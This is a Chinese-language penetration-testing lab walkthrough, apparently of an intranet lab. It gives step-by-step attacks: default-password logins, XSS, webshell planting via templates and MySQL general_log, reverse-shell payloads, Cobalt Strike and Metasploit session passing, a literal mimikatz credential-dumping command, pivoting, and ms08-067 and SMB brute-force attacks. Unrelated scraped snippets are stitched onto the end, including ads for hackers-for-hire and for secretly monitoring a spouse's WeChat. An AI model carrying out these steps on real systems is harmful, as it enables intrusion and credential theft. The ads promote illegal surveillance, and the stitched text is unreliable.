遇到的问题:配置好网卡后发现win7的net网卡获取不到地址,dhcp自动生成169.254.0.0/16的地址
解决反法:将虚拟机网卡顺序调对,网卡一是VMnet2,网卡2是nat,如下图
问题原因:自行理解
遇到问题:kali访问不了win7的web服务
解决办法:将net网卡修改成公用 ***
问题原因:自行理解
使用默认密码成功登入后台
使用root/root登入该网站的phpadmin页面,成功登入
在留言板中插入xss测试代码
登入后台查看留言管理,出现弹框
进入网站后台,在前台模板的default模板中新增一句话木马文件
根据之前下载的备份文件,找出写入一句话木马的文件路径
找到路径后测试一下木马是否可用
使用中国菜刀连接一句话木马
使用root/root登入phpmyadmin,查询全局日志文件
开启general_log,并指定新的日志文件
验证是否修改成功
写入一句话木马
使用菜刀连接
使用msfvenom生成payload文件,使用菜刀上传到www目录下
使用handler模块接收反弹模块,在6666端口上进行监听,访问shell.php,连接成功
1、getsystem提权
2、保存会话后,可使用以下绕过UAC的模块进行提权
3、可以使用windwos ms系列未修补漏洞进行提权,如ms16-032、ms17-010等。
用菜刀连接后打开虚拟终端,使用systeminfo命令查看目标打了什么补丁,再使用window提权辅助页面搜索对应的可利用exp进行提权
1. 下载Cobalt Strike
去网上下一个cs,复制到kali系统
2.开启Cobalt Strike
给服务端程序执行权限
执行cs服务端程序,开启服务,ip是kali的ip,密码是123
重新打开一个终端,在kali上执行cs客户端程序,用户名随意,密码123
创建一个监听器,ip就是kali的ip
生成生成Web Delivery
选择刚刚创建的那个Listener
会生成一条命令,使用菜刀连接webshell,打开虚拟终端,输入这条命令
目标主机就上线了,你就可以使用cs对它进行操作啦
比如屏幕截图,右击连接->Explore->Screenshot,再点击上面的图片小图片进入屏幕截图视图(点击View-Screenshot也行),就能看到目标的屏幕截图了
1、使用cs
使用 hashdump 和 logonpasswords 读内存和注册表密码,在 Credentials 模块下查看
2、使用mimikatz.exe程序
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" exit
使用msf开启3389端口
使用抓到的域名和主机密码登入,远程桌面命令mstsc
CS下的会话传给MSF
使用msf监听模块,ip就是kali的ip,端口就是监听的端口,payload要和cs相同,然后运行,开始监听
cs创建一个listener,ip也是kali的ip端口和kali监听端口一样,使用payload为Foreign HTTP
右击要传的会话,点击Spawn,选择foregin http那个listense
等它执行完命令,msf就会出现一个meterpreter
MSF下的会话传给CS
msf使用注入模块 + cs创建Listener监听 (相同payload)
use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set DisablePayloadHandler true
set lhost (cs listener ip)
set lport (cs listener port)
set session (id)
run
使用cs的socks功能将msf带入内网
cs配置:
打开会话,输入socks 1234(空格不能多)
进入 *** 视图,选中会话点击Tunnel,复制生成的文字
msf配置:
粘贴cs生成的命令 setg Proxies socks4:127.0.0.1:1234
setg ReverseAllowProxy true? ? ? ? ? ?允许反向 ***
修改/etc/proxychains.conf文件
使用msf的扫描模块扫描内网主机
添加路由,使得 MSF 能够通过 Win7 路由转发访问192.168.52.0 网段
使用cs将msf带入内网后,使用ms08-067攻击模块攻击内网主机,注意使用的是反向 *** ,所以这里payload需要使用正向
使用msf的 *** b口令猜测模块,配置参数用于 *** b口令爆破
漏洞原理:
微软修改 dcerpc 框架后形成自己的 RPC 框架来处理进程间的通信。微软的 RPC 框架在处理 TCP/IP 信息交换过程中存在的畸形消息时,未正确处理,导致缓冲区溢出漏洞;
此漏洞影响使用 RPC 框架的 DCOM 接口,DCOM 接口用来处理客户端机器发送给服务器的 DCOM 对象激活请求,如 UNC 路径
漏洞利用:
打2k8试下,也蓝屏
今天就是情人节了情人节当然少不了送花每一种花都有它的花语小编为大家收集了史上最全花语暗恋的、表白的总有一款适合你!桔梗花! 其实桔梗花的花语有两种说法,一种是永恒的爱,另一种是无望的爱。之所以会有两...
爱情小故事(五则感人的爱情故事) 因为太穷,租不起房子,夫妻两个搬进了鬼屋, 有一年,妻子眼睛瞎了,却看到满屋的鬼, 她吓得大喊大叫, 丈夫守护在身边:“有我呢,他们伤害不了你。” 紧握着妻...
伴随着电子商务的领域的快速发展趋势,及其大家消费习惯的更改,网络购物早已变成发展趋势。因此 很多创业人挑选在网上卖东西。可是针对新手开网店新手而言,不清楚在网络上怎么开店。看了本文,你也就能够 掌握怎...
本文目录一览: 1、黑客帝国国语版在哪能收看全集 2、求《黑客帝国》百度云高清资源在线观看,莉莉·沃卓斯基导演的 3、黑客帝国一共几部,每部的名字叫什么,中文和英文的都要,还要主要演员的名字?...
在线接单平台QQ你有没有注意到,当男孩通过微信和其他女孩交谈时,他们要么说生意是敷衍了事的。即使他们故意和女孩调情,他们也不会和真正喜欢和微信聊天的人聊天。 怎样偷偷关联老婆微信号?同步老婆的微信聊天...
先做事后支付的网络黑客的联系方式 确信很多 运用过iPhone的人,都掌握, 没有密码是进到不了系统的,如果是安卓手机,很有可能还好一键刷机一点,但是iPhone和安卓手机不一样,苹果手 确信很多 运...